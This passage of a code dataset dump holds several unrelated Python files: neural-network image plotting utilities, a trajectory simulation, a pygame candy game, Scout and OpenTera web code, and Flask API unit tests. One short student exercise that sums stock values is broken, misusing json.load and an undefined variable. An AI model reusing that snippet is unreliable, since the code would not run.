transparent = True, bbox_inches = 'tight', pad_inches = 0)\n\n    plt.show()\n\n\ndef plot_reconst(model, loader, latent_dim, device='cpu', num_img=1, grid_row_size=10, figsize=(30, 30), filename=None, conditional=False):\n    \"\"\"\n    Plot original images and the reconstructed images by the INN\n\n    :param model: INN used for reconstruction\n    :param loader: loader that wraps the train, test or evaluation set\n    :param latent_dim: dimension of the latent space\n    :param num_img: number of images to plot. Default: 1\n    :param grid_row_size: number of images in one row in the grid\n    :param figsize: the size of the generated plot\n    :param filename: file name under which the plot will be saved. 
(optional)\n :return: img: original images\n output: reconstructed images\n \"\"\"\n\n img, label = next(iter(loader))\n\n #model = model.to('cpu')\n model.eval()\n\n img = img.to(device)\n\n lat_img = model(img)\n shape = lat_img.shape\n lat_img = lat_img.view(lat_img.size(0), -1)\n if conditional:\n binary_label = lat_img.new_zeros(lat_img.size(0), 10)\n idx = torch.arange(label.size(0), dtype=torch.long)\n binary_label[idx, label] = 1\n lat_img_mod = torch.cat([lat_img[:, :latent_dim], binary_label, lat_img.new_zeros((lat_img[:, latent_dim+10:]).shape)], dim=1)\n else:\n lat_img_mod = torch.cat([lat_img[:, :latent_dim], lat_img.new_zeros((lat_img[:, latent_dim:]).shape)], dim = 1)\n\n lat_img_mod = lat_img_mod.view(shape)\n output = model(lat_img_mod, rev=True)\n\n print(\"Original Image:\")\n imshow(torchvision.utils.make_grid(img[:num_img].detach(), grid_row_size), figsize,\n filename + \"_original\" if (filename is not None) else None)\n print(\"Reconstructed Image:\")\n imshow(torchvision.utils.make_grid(output[:num_img].detach(), grid_row_size), figsize,\n filename + \"_reconstructed\" if (filename is not None) else None)\n\n return img, output\n\n\ndef plot_diff(model, loader, latent_dim, device='cpu', num_img=1, grid_row_size=10, figsize=(30, 30), filename=None, conditional=False):\n \"\"\"\n Plot original images, reconstructed images by the INN and the difference between those images.\n\n :param model: INN use for reconstruction\n :param loader: loader that wraps the train, test or evaluation set\n :param latent_dim: dimension of the latent space\n :param num_img: number of images to plot. Default: 1\n :param grid_row_size: number of images in one row in the grid\n :param figsize: the size of the generated plot\n :param filename: file name under which the plot will be saved. (optional)\n :return: None\n \"\"\"\n\n img, reconst_img = plot_reconst(model, loader, latent_dim, device, num_img, grid_row_size, figsize, filename, conditional)\n\n diff_img = (img - reconst_img + 1) / 2\n\n print(\"Difference:\")\n imshow(torchvision.utils.make_grid(diff_img[:num_img].detach(), grid_row_size), figsize,\n filename + \"_difference\" if (filename is not None) else None)\n\n\ndef plot_inter(img1, img2, num_steps=10, grid_row_size=10, figsize=(30, 30), filename=None):\n \"\"\"\n Plot interpolation between two images.\n\n :param img1: image 1\n :param img2: image 2\n :param num_steps: number of images to interpolate between image 1 and 2\n :param grid_row_size: number of images in one row in the grid\n :param figsize: the size of the generated plot\n :param filename: file name under which the plot will be saved. (optional)\n :return: None\n \"\"\"\n\n img_lst = []\n for p in np.linspace(0, 1, num=num_steps):\n img_temp = p * img1 + (1 - p) * img2\n img_lst.append(img_temp)\n\n img = torch.stack(img_lst)\n\n imshow(torchvision.utils.make_grid(img.detach(), grid_row_size), figsize, filename if (filename is not None) else None)\n\n\n\ndef plot_inter_latent(loader, model, latent_dim, num_steps=8, num_sample=1, figsize=(30, 30), filename=None):\n \"\"\"\n Plot latent space interpolation between two images from a data loader. 
Attention: num_steps * num_sample can not be\n bigger the batch size of the loader (This problem will be solved in the future)\n\n :param loader: loader that wraps the train, test or evaluation set\n :param model: INN used to project the images into the latent space\n :param latent_dim: dimension of the latent space\n :param num_steps: number of images to interpolate between two images\n :param num_sample: number of images to plot\n :param figsize: the size of the generated plot\n :param filename: file name under which the plot will be saved. (optional)\n :return: None\n \"\"\"\n\n img, label = next(iter(loader))\n\n model.to('cpu')\n model.eval()\n\n lat_img = model(img)\n lat_shape = lat_img.shape\n lat_img = lat_img.view(lat_img.size(0), -1)\n\n lat_img_int = []\n for i in range(int(len(lat_img) / num_steps)):\n if i == (len(lat_img) - 1):\n for p in np.linspace(0, 1, num=num_steps):\n lat_img_int_img = p * lat_img[i].detach().numpy() + (1 - p) * lat_img[0].detach().numpy()\n lat_img_int.append(lat_img_int_img)\n else:\n for p in np.linspace(0, 1, num=num_steps):\n lat_img_int_img = p * lat_img[i].detach().numpy() + (1 - p) * lat_img[i + 1].detach().numpy()\n lat_img_int.append(lat_img_int_img)\n\n lat_img_int = np.array(lat_img_int)\n lat_img_int = torch.from_numpy(lat_img_int)\n\n lat_img_mod = torch.cat([lat_img_int[:, :latent_dim], lat_img_int.new_zeros((lat_img_int[:, latent_dim:]).shape)], dim=1)\n lat_img_mod = lat_img_mod.view(lat_shape)\n\n output = model(lat_img_mod, rev=True)\n\n counter = 0\n for num in range(num_sample):\n inter_row_lst = []\n for i in range(num_steps):\n inter_row_lst.append(output[counter])\n counter += 1\n inter_row = torch.stack(inter_row_lst)\n imshow(torchvision.utils.make_grid(inter_row.detach(), num_steps), figsize,\n filename + \"_interpolation_{}\".format(num) if (filename is not None) else None)\n\n\n\ndef plot_samples(model, latent_dim, input_size, input_shape, num_sample=1, grid_row_size=10, figsize=(30, 30), filename=None):\n \"\"\"\n Generates samples from learned distribution by sampling prior and decoding.\n\n :param model: INN used for sampling\n :param latent_dim: dimension of the latent space\n :param input_size: total number of elements in the input of the INN\n :param input_shape: shape of the input for the INN\n :param num_sample: number of samples to generate\n :param grid_row_size: number of images in one row in the grid\n :param figsize: the size of the generated plot\n :param filename: file name under which the plot will be saved. 
(optional)\n :return: None\n \"\"\"\n\n model.to('cpu')\n model.eval()\n\n prior_samples = tra.traverse_continous_grid(latent_dim, input_size, None, 0, num_sample, grid_row_size, True)\n\n if len(input_shape) == 2:\n prior_samples = prior_samples.view(num_sample, input_shape[0], input_shape[1])\n elif len(input_shape) == 3:\n prior_samples = prior_samples.view(num_sample, input_shape[0], input_shape[1], input_shape[2])\n else:\n raise ValueError(\"input_shape is neither 2- nor 3-dimensional\")\n\n generate = model(prior_samples, rev=True)\n\n imshow(torchvision.utils.make_grid(generate.detach(), grid_row_size), figsize, filename if (filename is not None) else None)\n\n\ndef plot_latent_traversal_line(model, latent_dim, input_size, input_shape, idx, num_sample=1, figsize=(30, 30), filename=None, dataset=None, conditional_target=None, device='cpu'):\n \"\"\"\n Generates an image traversal through a latent dimension.\n\n :param model: INN used for sampling\n :param latent_dim: dimension of the latent space\n :param input_size: total number of elements in the input of the INN\n :param input_shape: shape of the input for the INN\n :param idx: Index of a continuous latent dimension to traverse. If None, no latent is traversed and all latent\n dimensions are randomly sampled or kept fixed.\n :param num_sample: number of samples to generate\n :param figsize: the size of the generated plot\n :param filename: file name under which the plot will be saved. (optional)\n :param dataset: dataset to draw images from for which the latent traversal will be created\n :return: None\n \"\"\"\n\n model.to(device)\n model.eval()\n\n if dataset is not None:\n loader = dl.get_loader(dataset, num_sample)\n\n img, label = next(iter(loader))\n\n lat_img = model(img)\n lat_img = lat_img.view(lat_img.size(0), -1)\n else:\n lat_img = None\n\n latent_samples = tra.traverse_continous_line(latent_dim, input_size, idx, num_sample, False, lat_img, conditional_target=conditional_target)\n\n if len(input_shape) == 2:\n latent_samples = latent_samples.view(num_sample, input_shape[0], input_shape[1])\n elif len(input_shape) == 3:\n latent_samples = latent_samples.view(num_sample, input_shape[0], input_shape[1], input_shape[2])\n else:\n raise ValueError(\"input_shape is neither 2- nor 3-dimensional\")\n\n generate = model(latent_samples.to(device), rev=True)\n\n imshow(torchvision.utils.make_grid(generate.detach(), num_sample), figsize, filename if (filename is not None) else None)\n\n\ndef plot_all_traversals_grid(model, latent_dim, input_size, input_shape, num_sample=1, figsize=(30, 30), filename=None, conditional_target=None, device='cpu'):\n \"\"\"\n Generates a grid of images for all latent dimensions, where each row corresponds to a traversal along a latent\n dimension.\n\n :param model: INN used for sampling\n :param latent_dim: dimension of the latent space\n :param input_size: total number of elements in the input of the INN\n :param input_shape: shape of the input for the INN\n :param idx: Index of a continuous latent dimension to traverse. If None, no latent is traversed and all latent\n dimensions are randomly sampled or kept fixed.\n :param num_sample: number of samples to generate\n :param figsize: the size of the generated plot\n :param filename: file name under which the plot will be saved. 
(optional)\n :return: None\n \"\"\"\n \n model.to(device)\n model.eval()\n \n if len(input_shape) != 3:\n raise ValueError(\"input_shape must be 3-dimensional\")\n \n\n grid = [] \n for idx in range(latent_dim):\n latent_samples = tra.traverse_continous_line(latent_dim, input_size, idx, num_sample, False, lat_img=None, conditional_target=conditional_target)\n \n latent_samples = latent_samples.view(num_sample, input_shape[0], input_shape[1], input_shape[2])\n\n generate = model(latent_samples.to(device), rev=True)\n \n grid.append(generate)\n \n grid = torch.cat(grid)\n\n imshow(torchvision.utils.make_grid(grid.detach(), num_sample), figsize, filename if (filename is not None) else None)\n\n\ndef plot_latent_traversal_grid(model, latent_dim, input_size, input_shape, idx, axis=0, num_sample=1, grid_row_size=10, figsize=(30, 30), filename=None, idx_2=None):\n \"\"\"\n Generates a grid of image traversals through two latent dimensions.\n\n :param model: INN used for sampling\n :param latent_dim: dimension of the latent space\n :param input_size: total number of elements in the input of the INN\n :param input_shape: shape of the input for the INN\n :param idx: Index of a continuous latent dimension to traverse. If None, no latent is traversed and all latent\n dimensions are randomly sampled or kept fixed.\n :param axis: Either 0 for traversal across the rows or 1 for traversal across the columns.\n :param num_sample: number of samples to generate\n :param grid_row_size: number of images in one row in the grid\n :param figsize: the size of the generated plot\n :param filename: file name under which the plot will be saved. (optional)\n :return: None\n \"\"\"\n\n latent_samples = tra.traverse_continous_grid(latent_dim, input_size, idx, axis, num_sample, grid_row_size, idx_2=idx_2)\n\n if len(input_shape) == 2:\n latent_samples = latent_samples.view(num_sample, input_shape[0], input_shape[1])\n elif len(input_shape) == 3:\n latent_samples = latent_samples.view(num_sample, input_shape[0], input_shape[1], input_shape[2])\n else:\n raise ValueError(\"input_shape is neither 2- nor 3-dimensional\")\n\n generate = model(latent_samples, rev=True)\n\n imshow(torchvision.utils.make_grid(generate.detach(), grid_row_size), figsize, filename if (filename is not None) else None)\n\n\ndef plot_all_traversals(model, latent_dim, input_size, input_shape, num_sample=8, figsize=(30, 30), filename=None, conditional_target=None, device='cpu'):\n \"\"\"\n Generates a grid of images for all latent dimensions, where each row corresponds to a traversal along a latent\n dimension.\n\n :param model: INN used for sampling\n :param latent_dim: dimension of the latent space\n :param input_size: size of the input for INN\n :param num_sample: Number of samples for each latent traversal\n :param figsize: the size of the generated plot\n :param filename: file name under which the plot will be saved. 
(optional)\n :return: None\n \"\"\"\n\n #latent_samples = []\n\n for idx in range(latent_dim):\n plot_latent_traversal_line(model, latent_dim, input_size, input_shape, idx, num_sample, figsize, filename, conditional_target=conditional_target, device=device)\n\n #imshow(torchvision.utils.make_grid(generate.detach(), num_sample), figsize, filename if (filename is not None) else None)\n\n\n\n\n\n\n\n\n","sub_path":"functionalities/.ipynb_checkpoints/plot-checkpoint.py","file_name":"plot-checkpoint.py","file_ext":"py","file_size_in_byte":18046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"449779879","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport math\n\nh = 0.01\ntiempo = 400\nR = 2\n\npt = np.arange(0,tiempo,h)\nlvx = np.arange(0,1,0.05)\n\nax = []\nay = []\nvx = []\nvy = []\n\ncuerpo = plt.Circle((0, 0), R,lw=1,alpha=0.5)\nplt.gcf().gca().add_artist(cuerpo)\n\nfor vx0 in lvx:\n x = 0\n y = 7\n vx = [vx0]\n vy = [0]\n px = [0,x]\n py = [0,y]\n for t in pt:\n ax.append(-x / (x**2 + y**2) ** (1.5))\n ay.append(-y / (x**2 + y**2) ** (1.5))\n vx.append(vx[-1] + ax[-1] * h)\n vy.append(vy[-1] + ay[-1] * h)\n x = x + vx[-1] * h\n y = y + vy[-1] * h\n if x >= 20:\n break\n if x**2 + y**2 <= R**2:\n break\n px.append(x)\n py.append(y)\n\n plt.plot(px,py)\nplt.show()\n","sub_path":"FisicaComputacional/QuintaPractica/1_1.py","file_name":"1_1.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"477719013","text":"import logging\n\nLOG = logging.getLogger(__name__)\n\ndef get_dashboard_info(adapter, institute_id=None):\n \"\"\"Returns cases with phenotype\n \n If phenotypes are provided search for only those\n \n Args:\n adapter(adapter.MongoAdapter)\n institute_id(str)\n \n Returns:\n data(dict): Dictionary with relevant information\n \"\"\"\n general_info = get_general_case_info(adapter, institute_id)\n total_cases = general_info['total_cases']\n \n data = {'total_cases': total_cases}\n if total_cases == 0:\n return data\n \n data['pedigree'] = []\n for ped_info in general_info['pedigree'].values():\n ped_info['percent'] = ped_info['count'] / total_cases\n data['pedigree'].append(ped_info)\n \n \n data['cases'] = get_case_groups(adapter, total_cases, institute_id)\n \n data['analysis_types'] = get_analysis_types(adapter, total_cases, institute_id)\n\n # Fetch variant information\n LOG.info(\"Fetch sanger variants\")\n validation_query = {'sanger_ordered': True}\n\n # Case level information\n validation_cases = set()\n validated_cases = set()\n \n # Variant level information\n validated_tp = set()\n validated_fp = set()\n\n LOG.info(\"Find all validated variants with query {}\".format(institute_id))\n validation_ordered = adapter.variant_collection.find(validation_query)\n\n case_ids = general_info['case_ids']\n nr_ordered = 0\n for nr_ordered, variant in enumerate(validation_ordered,1):\n case_id = variant['case_id']\n if institute_id:\n if not case_id in case_ids:\n continue\n variant_id = variant['_id']\n # Add case id to validation cases\n validation_cases.add(case_id)\n\n validation = variant.get('validation')\n if validation == 'True positive':\n validated_tp.add(variant_id)\n validated_cases.add(case_id)\n\n elif validation == 'False positive':\n validated_fp.add(variant_id)\n validated_cases.add(case_id)\n \n nr_validation_cases = len(validation_cases)\n\n overview = [\n {\n 'title': 'Phenotype terms',\n 'count': 
general_info['phenotype_cases'],\n 'percent': general_info['phenotype_cases'] / total_cases,\n }, \n {\n 'title': 'Causative variants',\n 'count': general_info['causative_cases'],\n 'percent': general_info['causative_cases'] / total_cases,\n }, \n {\n 'title': 'Pinned variants',\n 'count': general_info['pinned_cases'],\n 'percent': general_info['pinned_cases'] / total_cases,\n }, \n {\n 'title': 'Cohort tag',\n 'count': general_info['cohort_cases'],\n 'percent': general_info['cohort_cases'] / total_cases,\n }\n ]\n if nr_validation_cases:\n overview.append(\n {\n 'title': 'Validation ordered',\n 'count': nr_validation_cases,\n 'percent': nr_validation_cases / total_cases,\n })\n overview.append(\n {\n 'title': 'Validated',\n 'count': len(validated_cases),\n 'percent': len(validated_cases) / nr_validation_cases,\n })\n\n data['overview'] = overview\n \n variants = []\n nr_validated = len(validated_tp) + len(validated_fp)\n if nr_ordered:\n variants.append(\n {\n 'title': 'Validation ordered',\n 'count': nr_ordered,\n 'percent': 1\n }\n )\n if nr_validated:\n variants.append(\n {\n 'title': 'Validated True Positive',\n 'count': len(validated_tp),\n 'percent': len(validated_tp) / nr_validated,\n }\n )\n \n variants.append(\n {\n 'title': 'Validated False Positive',\n 'count': len(validated_fp),\n 'percent': len(validated_fp) / nr_validated,\n }\n )\n \n data['variants'] = variants\n \n return data\n\ndef get_general_case_info(adapter, institute_id=None):\n \"\"\"Return general information about cases\n \n Args:\n adapter(adapter.MongoAdapter)\n institute_id(str)\n \n Returns:\n general(dict)\n \"\"\"\n general = {}\n # Fetch information about cases with certain activities\n cases = adapter.cases(collaborator=institute_id)\n \n phenotype_cases = 0\n causative_cases = 0\n pinned_cases = 0\n cohort_cases = 0\n \n pedigree = {\n 1: {\n 'title': 'Single',\n 'count': 0\n },\n 2: {\n 'title': 'Duo',\n 'count': 0\n },\n 3: {\n 'title': 'Trio',\n 'count': 0\n },\n 'many': {\n 'title': 'Many',\n 'count': 0\n },\n }\n \n case_ids = set()\n \n total_cases = 0\n for total_cases,case in enumerate(cases,1):\n # If only looking at one institute we need to save the case ids\n if institute_id:\n case_ids.add(case['_id'])\n if case.get('phenotype_terms'):\n phenotype_cases += 1\n if case.get('causatives'):\n causative_cases += 1\n if case.get('suspects'):\n pinned_cases += 1\n if case.get('cohorts'):\n cohort_cases += 1\n \n nr_individuals = len(case.get('individuals',[]))\n if nr_individuals == 0:\n continue\n if nr_individuals > 3:\n pedigree['many']['count'] += 1\n else:\n pedigree[nr_individuals]['count'] += 1\n \n general['total_cases'] = total_cases\n general['phenotype_cases'] = phenotype_cases\n general['causative_cases'] = causative_cases\n general['pinned_cases'] = pinned_cases\n general['cohort_cases'] = cohort_cases\n general['pedigree'] = pedigree\n general['case_ids'] = case_ids\n\n return general\n \n\ndef get_case_groups(adapter, total_cases, institute_id=None):\n \"\"\"Return the information about case groups\n \n Args:\n store(adapter.MongoAdapter)\n total_cases(int): Total number of cases\n \n Returns:\n cases(dict):\n \"\"\"\n # Create a group with all cases in the database\n cases = [{'status': 'all', 'count': total_cases, 'percent': 1}]\n # Group the cases based on their status\n pipeline = []\n group = {'$group' : {'_id': '$status', 'count': {'$sum': 1}}}\n query = {}\n if institute_id:\n query = {'$match': {'owner': institute_id}}\n \n if query:\n pipeline.append(query)\n\n 
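    # the optional $match stage (institute filter) must precede the $group stage that counts cases per status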
pipeline.append(group)\n res = adapter.case_collection.aggregate(pipeline)\n \n for status_group in res:\n cases.append({'status': status_group['_id'],\n 'count': status_group['count'],\n 'percent': status_group['count'] / total_cases})\n \n return cases\n\ndef get_analysis_types(adapter, total_cases, institute_id=None):\n \"\"\"Return information about case status\"\"\"\n # Group cases based on analysis type of the individuals\n query = {}\n if institute_id:\n query = {'$match': {'owner': institute_id}}\n \n pipeline = []\n if query:\n pipeline.append(query)\n \n pipeline.append({'$unwind': '$individuals'})\n pipeline.append({'$group': {'_id': '$individuals.analysis_type', 'count': {'$sum': 1}}})\n analysis_query = adapter.case_collection.aggregate(pipeline)\n analysis_types = [{'name': group['_id'], 'count': group['count']} for group in analysis_query]\n \n return analysis_types","sub_path":"scout/server/blueprints/dashboard/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":7656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"36060568","text":"import random\r\nimport pygame\r\npygame.init()\r\n\r\nWIDTH = 800\r\nHEIGHT = 600\r\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\r\n\r\nhero = pygame.sprite.Sprite()\r\nhero.image = pygame.image.load('spriteguyc.png')\r\nhero.rect = hero.image.get_rect()\r\nhero_group = pygame.sprite.GroupSingle(hero)\r\n\r\nTILE_SIZE = 10 # This makes each frame 10x10px\r\nNUM_TILES_WIDTH = 128\r\nNUM_TILES_HEIGHT = 80\r\n\r\nmunch_sounda = pygame.mixer.Sound('noma.wav') # Just a few sounds for the sprite eating the candy\r\nmunch_soundb = pygame.mixer.Sound('nomb.wav') # \" \"\r\nmunch_soundc = pygame.mixer.Sound('nomc.wav') # \" \"\r\n\r\ncandies = pygame.sprite.OrderedUpdates()\r\n\r\n\r\ndef add_candy(candies): # This is the function I use to spawn the candies onto the screen\r\n candy = pygame.sprite.Sprite()\r\n candy.image = pygame.image.load('candy.png')\r\n candy.rect = candy.image.get_rect()\r\n candy.rect.left = random.randint(10, int(NUM_TILES_WIDTH) - 10) * int(TILE_SIZE)\r\n candy.rect.top = random.randint(10, int(NUM_TILES_HEIGHT) - 10) * int(TILE_SIZE)\r\n candies.add(candy)\r\n\r\n\r\nfor i in range(10):\r\n add_candy(candies)\r\n\r\niteration = 0\r\n\r\nheropos = 0\r\nheroposa = 0\r\n\r\nheld = [] # This is the list that will hold all of the keys that are being pressed, every time the main loop iterates\r\n# it reads through and checks what \"movements\" there are and does them.\r\nfinish = False # Main loop\r\nwin = False # Keeps the game running and candy spawning while false\r\nscore = 0 # Setting the score variable, will be raised in intervals of 50, 50 per candy collected, will be replaced\r\n# gold, the same basic thing will be used for exp and stuff\r\n\r\nclock = pygame.time.Clock()\r\nclock.tick(120)\r\n\r\nwhile not finish:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n finish = True\r\n if event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:\r\n finish = True\r\n if event.type == pygame.KEYDOWN:\r\n held.append(event.key) # This is the held list being appended with whatever key is being held\r\n elif event.type == pygame.KEYUP:\r\n held.remove(event.key) # \" \"\r\n if event.type == pygame.USEREVENT:\r\n if not win: # This is just seeing if the game is not over, otherwise it keeps adding candies once you win\r\n add_candy(candies)\r\n screen.fill((50, 50, 50)) # This is to avoid the hero leaving a 
trail\r\n # update hero position\r\n if pygame.K_UP in held: # This checks if the UP arrow key is in the held list\r\n hero.rect.top -= TILE_SIZE # This takes the amount of times that the UP arrow key is in the list and moves the\r\n # sprite that many times\r\n heroposa = hero.rect.top\r\n if pygame.K_DOWN in held: # This checks if the DOWN arrow key is in the held list\r\n hero.rect.top += TILE_SIZE # This takes the amount of times that the DOWN arrow key is in the list and moves\r\n # the sprite that many times\r\n heroposa = hero.rect.top\r\n if pygame.K_RIGHT in held: # This checks if the RIGHT arrow key is in the the held list\r\n hero.rect.right += TILE_SIZE # This takes the amount of times that the RIGHT arrow key is in the list and moves\r\n # the sprite that many times\r\n heropos = hero.rect.right\r\n heroposa = hero.rect.top\r\n hero = pygame.sprite.Sprite()\r\n hero.image = pygame.image.load('spriteguyc.png')\r\n hero.rect = hero.image.get_rect()\r\n hero_group = pygame.sprite.GroupSingle(hero)\r\n hero.rect.right = heropos\r\n hero.rect.top = heroposa\r\n if pygame.K_LEFT in held: # This checks if the LEFT arrow key is in the held list\r\n hero.rect.right -= TILE_SIZE # This takes the amount of times that the LEFT arrow key is in the list and moves\r\n # the sprite that many times\r\n heropos = hero.rect.right\r\n heroposa = hero.rect.top\r\n hero = pygame.sprite.Sprite()\r\n hero.image = pygame.image.load('spriteguyd.png')\r\n hero.rect = hero.image.get_rect()\r\n hero_group = pygame.sprite.GroupSingle(hero)\r\n hero.rect.right = heropos\r\n hero.rect.top = heroposa\r\n hero.rect.clamp_ip(screen.get_rect()) # This keeps the sprite from moving outside of the screen\r\n hero_group.draw(screen) # This draws the objects in the \"hero_group\" to the \"screen\"\r\n if not win: # This checks that the game is not over\r\n if iteration % 50 == 0: # This is just a steady rate of spawning candies, not too fast, not too slow\r\n add_candy(candies)\r\n candies.draw(screen)\r\n collides = pygame.sprite.groupcollide(hero_group, candies, False, True) # So when the sprite and the candies\r\n # collide the candies disappear\r\n if len(collides) > 0: # This checks if the length of the value of collides is greater than 0, if it is, then a\r\n # collision has occurred\r\n score += 50 # This is the score, it is raised in lots of 50\r\n roll = random.randint(0, 2) # This rolls between 3 values, 0, 1 and 2, this is used to determine the \"munch\" sound\r\n if roll == 0:\r\n if len(collides) > 0:\r\n munch_sounda.play() # The sfx for eating the candy, variant a\r\n elif roll == 1:\r\n if len(collides) > 0:\r\n munch_soundb.play() # The sfx for eating the candy, variant b\r\n elif roll == 2:\r\n if len(collides) > 0:\r\n munch_soundc.play() # The sfx for eating the candy, variant c\r\n pygame.sprite.groupcollide(hero_group, candies, False, True)\r\n if len(candies) == 0:\r\n win = True # Making this true, makes the candies stop spawning\r\n if win: # Again, checks if \"win\" is true\r\n text_score = str(score) + \" points\" # This one is just making the score into a string and then formatting it\r\n # how I want it\r\n font = pygame.font.Font(None, 36)\r\n text_image = font.render(\"You Win! 
\" + text_score, True, (255, 255, 255))\r\n text_rect = text_image.get_rect(centerx=WIDTH/2, centery=100)\r\n screen.blit(text_image, text_rect)\r\n if not win: # While the game is going\r\n text_score = str(score) + \" points\" # same as before\r\n score_font = pygame.font.Font(None, 30)\r\n score_image = score_font.render(text_score, True, (255, 255, 255))\r\n score_rect = score_image.get_rect(centerx=100, centery=100)\r\n screen.blit(score_image, score_rect)\r\n pygame.display.update() # Updates the screen with all the new changes\r\n iteration += 1 # This is for the candy spawning\r\npygame.quit()\r\n","sub_path":"runnergameSubmission-Day/testingpygame.py","file_name":"testingpygame.py","file_ext":"py","file_size_in_byte":6703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"510054936","text":"from flask.views import MethodView\nfrom flask import render_template, request\nfrom opentera.services.ServiceAccessManager import ServiceAccessManager, current_participant_client\n\n\nclass ParticipantDashboard(MethodView):\n\n def __init__(self, *args, **kwargs):\n self.flaskModule = kwargs.get('flaskModule', None)\n\n @ServiceAccessManager.token_required(allow_static_tokens=True, allow_dynamic_tokens=False)\n def get(self):\n # print('get')\n\n hostname = self.flaskModule.config.service_config['hostname']\n port = self.flaskModule.config.service_config['port']\n backend_hostname = self.flaskModule.config.backend_config['hostname']\n backend_port = self.flaskModule.config.backend_config['port']\n if 'X_EXTERNALHOST' in request.headers:\n backend_hostname = request.headers['X_EXTERNALHOST']\n\n if 'X_EXTERNALPORT' in request.headers:\n backend_port = request.headers['X_EXTERNALPORT']\n\n participant_name = \"Anonymous\"\n\n if current_participant_client:\n participant_info = current_participant_client.get_participant_infos()\n if participant_info and 'participant_name' in participant_info:\n participant_name = participant_info['participant_name']\n\n return render_template('participant_dashboard.html', hostname=hostname, port=port,\n backend_hostname=backend_hostname, backend_port=backend_port,\n participant_name=participant_name,\n participant_token=current_participant_client.participant_token,\n participant_uuid=current_participant_client.participant_uuid\n )\n","sub_path":"teraserver/python/services/VideoRehabService/Views/ParticipantDashboard.py","file_name":"ParticipantDashboard.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"648032329","text":"import json\nwith open(\"estoque.json\", \"r\") as arquivo:\n cont = arquivo.read()\ndic = json.load(cont)\nsoma = 0\nfor i in dic[\"produtos\"]:\n valor_ = dic[\"quantidade\"]*dic[\"valor\"]\n soma += valor\nprint(soma)\n ","sub_path":"backup/user_270/ch159_2020_05_06_12_30_20_965187.py","file_name":"ch159_2020_05_06_12_30_20_965187.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"624581290","text":"from app import app\nimport app as apper\nimport unittest\nimport json\nimport os\nimport tempfile\n\n\nclass LocatorTest(unittest.TestCase):\n\n insert_data = json.dumps({\n 'pin': 'IN/110001',\n 'name': 'Connaught Place',\n 'admin': 'New Delhi',\n 'lat': 28.6333,\n 'lon': 77.2167,\n })\n\n data = json.dumps({\n 'latitude': 28.6333,\n 'longitude': 77.2167,\n 'radius': 5.0,\n })\n\n headers = {\n 
'Content-Type': 'application/json',\n        'Accept': 'application/json',\n    }\n\n    insert_sql = \"Insert into Location values (?,?,?,?,?,?)\"\n    select_sql = \"Select * from Location\"\n\n    def setUp(self):\n        app.config['TESTING'] = True\n        self.db_fd, app.config['DATABASE'] = tempfile.mkstemp()\n\n        self.app = app.test_client()\n        apper.init_db()\n\n    def tearDown(self):\n        os.close(self.db_fd)\n        os.unlink(app.config['DATABASE'])\n\n    def test_database(self):\n        test = os.path.exists('apper.db')\n        self.assertFalse(test)\n\n    def test_emptyDb(self):\n        with app.app_context():\n            cur = apper.get_db().cursor()\n            cur.execute(self.select_sql)  # run the select so fetchall() has an executed statement to read from\n            d = cur.fetchall()\n            self.assertEqual(len(d), 0)\n\n    def test_firstInsertDb(self):\n        data = ('1','Gurgaon', 'Haryana', 45.23, 23.21, 5)\n        with app.app_context():\n            cur = apper.get_db().cursor()\n            cur.execute(self.insert_sql, data)\n            self.assertEqual(cur.lastrowid, 1)\n\n    def test_updateDb(self):\n        data = ('1', 'Gurgaon', 'Haryana', 45.23, 23.21, 5)\n        with app.app_context():\n            conn = apper.get_db()\n            cur = conn.cursor()\n            cur.execute(self.insert_sql, data)\n            conn.commit()\n\n            sql2 = \"Update Location set place_name='South Delhi' where accuracy=5\"\n            cur.execute(sql2)\n            conn.commit()\n\n            #sql3 = \"Select * from Location\" #\" where place_name='Gurgaon'\"\n            cur.execute(self.select_sql)\n            d = cur.fetchone()\n\n            self.assertEqual(d['place_name'], 'South Delhi')\n\n    def test_dbSelectQuery(self):\n        data = ('1','Gurgaon', 'Haryana', 45.23, 23.21, 5)\n        with app.app_context():\n            conn = apper.get_db()\n            cur = conn.cursor()\n            #sql1 = \"INSERT INTO Location VALUES ('1', 'Gurgaon', 'Haryana', 45.23, 23.21, 5)\"\n            cur.execute(self.insert_sql, data)\n            conn.commit()\n\n            sql2 = \"SELECT * FROM Location where accuracy=0\"\n            cur.execute(sql2)\n            d = cur.fetchall()\n\n            self.assertEqual(len(d), 0)\n\n    def test_schemaSql(self):\n        pass\n\n    def test_main(self):\n        resp = self.app.get('/', follow_redirects=True)\n        self.assertEqual(resp.status_code, 404)\n\n    def test_get1(self):\n        resp = self.app.get('/get_using_self', follow_redirects=True)\n        self.assertEqual(resp.status_code, 200)\n\n    def test_get2(self):\n        resp = self.app.get('/get_using_postgres', follow_redirects=True)\n        self.assertEqual(resp.status_code, 200)\n\n    def test_post1(self):\n        resp = self.app.get('/post_location', follow_redirects=True)\n        self.assertEqual(resp.status_code, 405)\n\n    def test_post2(self):\n        resp = self.app.post('/post_location', data=self.insert_data, headers=self.headers)\n        data = json.loads(resp.get_data(as_text=True))\n        self.assertEqual(resp.status_code, 200)\n\n    def test_postApi(self):\n        resp = self.app.post('/post_location', data=self.insert_data, headers=self.headers)\n        data = json.loads(resp.get_data(as_text=True))\n        self.assertEqual(data['msg'], 'Already present')\n\n    def testPostWrongData(self):\n        insert_data = json.dumps({\n            'pin':'IN/810001',\n            'admin':'New Delhi',\n            'lat':28.6333,\n            'lon':77.2167,\n        })\n        res = self.app.post(\"/post_location\", data=insert_data, headers=self.headers)\n        data = json.loads(res.get_data(as_text=True))\n        self.assertEqual(data['msg'], 'Incomplete data')\n\n    def testCompareGetApis(self):\n        res1 